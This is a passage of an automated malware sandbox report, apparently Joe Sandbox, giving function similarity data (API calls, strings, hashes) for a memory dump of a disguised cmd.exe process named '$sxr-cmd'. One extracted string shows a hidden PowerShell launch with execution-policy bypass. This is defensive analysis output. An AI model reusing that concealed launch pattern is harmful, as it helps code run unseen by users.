                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                            • String ID: FAT$~
                                                                                                            • API String ID: 2238823677-1832570214
                                                                                                            • Opcode ID: 86a1f015c0a7fb555ea8968511af05af10d745c8640f90800e65605327948ca6
                                                                                                            • Instruction ID: 0fe7c303ab00a05f28ccb56a8cb5f0f96f32b3533ac4bbf97cf0c9e7954586d0
                                                                                                            • Opcode Fuzzy Hash: 86a1f015c0a7fb555ea8968511af05af10d745c8640f90800e65605327948ca6
                                                                                                            • Instruction Fuzzy Hash: 0F717F32608FC1C9EBA1AF2198902E9B7A4FB49794F844135DA4D6BA58DF3CD64DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED884
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED89D
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED94D
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED964
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF7137EDB89
                                                                                                            • wcstol.MSVCRT ref: 00007FF7137EDBDF
                                                                                                            • wcstol.MSVCRT ref: 00007FF7137EDC63
                                                                                                            • memmove.MSVCRT ref: 00007FF7137EDD33
                                                                                                            • memmove.MSVCRT ref: 00007FF7137EDE9A
                                                                                                            • longjmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137EDF1F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1051989028-0
                                                                                                            • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                            • Instruction ID: 785a052ce1064a5ad02c26d42fe65cc95e984f2e59c2e00467091c1798379fe7
                                                                                                            • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                            • Instruction Fuzzy Hash: 7B02A532A08F41C5EBA0AB18E480279F6A1FB48BA4F944231DA9D37794DF7DD45DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                            • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                            • API String ID: 3223794493-3086019870
                                                                                                            • Opcode ID: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                            • Instruction ID: 684f7dab331e2955500d41cb11ac0dfccf61c9359d40fc602d9623ee95c0e937
                                                                                                            • Opcode Fuzzy Hash: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                            • Instruction Fuzzy Hash: 15518F21A08E42C9EB94AB15A450179FBA4FF4DB60F989235C95E233A0DF7DE45DC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71380C6DB), ref: 00007FF7137F58EF
                                                                                                              • Part of subcall function 00007FF7137F081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7137F084E
                                                                                                            • towupper.MSVCRT ref: 00007FF71380C1C9
                                                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71380C31C
                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF71380C5CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                            • String ID: %s $%s>$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO$PROMPT$Unknown$\$x
                                                                                                            • API String ID: 2242554020-3399287567
                                                                                                            • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                            • Instruction ID: 8137b5115f7ac21cb2c252796db319f5654bfe357181687fd3a5408acf8075d6
                                                                                                            • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                            • Instruction Fuzzy Hash: BB126121A18F4281EFA4AF15A44017AE6A0FF44BB0FD44235D96E2B7E0DE3EE559D730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                            • String ID: \\.\
                                                                                                            • API String ID: 799470305-2900601889
                                                                                                            • Opcode ID: 5811be275bcc2b1884d73676e62e8c16ceee1b23a1cbd43db07b10be63971868
                                                                                                            • Instruction ID: 2112f589ed22c5a2d0206a39ba14b8e663e9a0dfeb8ad79a079912547beaba27
                                                                                                            • Opcode Fuzzy Hash: 5811be275bcc2b1884d73676e62e8c16ceee1b23a1cbd43db07b10be63971868
                                                                                                            • Instruction Fuzzy Hash: 8151A832A08EC285EBA0AF11D8802B9F7A8FB89BA4F854535D91D57794DF3CD54D8720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1944892715-0
                                                                                                            • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                            • Instruction ID: 0eb9da6572477042c45a3c956b80496c37c2c0dfd9cd1bae5a7351810b8d8de1
                                                                                                            • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                            • Instruction Fuzzy Hash: 8BB17221A09E4296EBE0BF11A490179EAA5BF4DBA0F848135CA5E77390DF7DE44CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
                                                                                                              • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                              • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
                                                                                                              • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                              • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                              • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137E54DE
                                                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7137E552B
                                                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7137E554F
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF71380345F
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF71380347E
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7138034C3
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7138034DB
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7138034FA
                                                                                                              • Part of subcall function 00007FF7137F36EC: _get_osfhandle.MSVCRT ref: 00007FF7137F3715
                                                                                                              • Part of subcall function 00007FF7137F36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F3770
                                                                                                              • Part of subcall function 00007FF7137F36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F3791
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1356649289-0
                                                                                                            • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                            • Instruction ID: ced070693369209c6f25d379cf3f5016e7c39627d4c01fbb06519aebc706c1ab
                                                                                                            • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                            • Instruction Fuzzy Hash: 4B919332A08F42CBE794AF15A44017AF6E5FB88BA0F844135DA5E677A0DF7DD458CB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                            • String ID: %s$/-.$:
                                                                                                            • API String ID: 1644023181-879152773
                                                                                                            • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                            • Instruction ID: 39eaa79eaa289f2585c5334814124636ab579e618aa97a607cf9a16dd42a8337
                                                                                                            • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                            • Instruction Fuzzy Hash: B491A222A28E4285FF90BB14D4402B9EAE0FF44BA4FD44135D94E6A6D4DE3EE59DC331
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF713807251), ref: 00007FF71380628E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait
                                                                                                            • String ID: wil
                                                                                                            • API String ID: 24740636-1589926490
                                                                                                            • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                            • Instruction ID: e6c1081329daca6271a9f114626134c00137b048fe7052d13b12f1a1103cef33
                                                                                                            • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                            • Instruction Fuzzy Hash: CB415331A08D4287F3A06B21D40027AA6E1EF867B4FF59131D90D6A6D4CF7ED46C8771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                            • String ID: $Application$System
                                                                                                            • API String ID: 3377411628-1881496484
                                                                                                            • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                            • Instruction ID: 44f18c17b60452acb20e90c92adf2542a1594e4029d6363e36c7e16f017bec4a
                                                                                                            • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                            • Instruction Fuzzy Hash: 97417C32B04F419AE750AF60E4403EDB7B4FB89768F845235DA4E66B58EF38D119C760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
• API String ID: 3961617410-1166558509
• Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
• Instruction ID: 0fb404038a352ca43de92ea80e5550c4f98a848643a0b04e881d8a3e9ae339e4
• Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
• Instruction Fuzzy Hash: BB217421A18E428AE7D07B60B4850B9FAA1FB4DB75FC48231D92F63394DF7CD44C8620
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CreateDirectoryDriveFullNamePathTypememset
• String ID:
• API String ID: 1397130798-0
• Opcode ID: 8e41fef93c0c3e03a2b4858334dae578715ba76b45c3a51f6cef48e23758e3a9
• Instruction ID: bbcaf1b4ebca8c90bee4727695558eb70100192b9a373ae943c8290bd9f8bb2d
• Opcode Fuzzy Hash: 8e41fef93c0c3e03a2b4858334dae578715ba76b45c3a51f6cef48e23758e3a9
• Instruction Fuzzy Hash: C9917522A08E8186FBE5AB1194802B9F7A9FF48BA4FC58135D95D27794DF3CD54C8720
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
  • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
  • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
  • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
• _wcsicmp.MSVCRT ref: 00007FF7137F25CA
• _wcsicmp.MSVCRT ref: 00007FF7137F25E8
• _wcsicmp.MSVCRT ref: 00007FF7137F260F
• _wcsicmp.MSVCRT ref: 00007FF7137F2636
• _wcsicmp.MSVCRT ref: 00007FF7137F2650
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsicmp$Heap$AllocProcess
• String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
• API String ID: 3407644289-1668778490
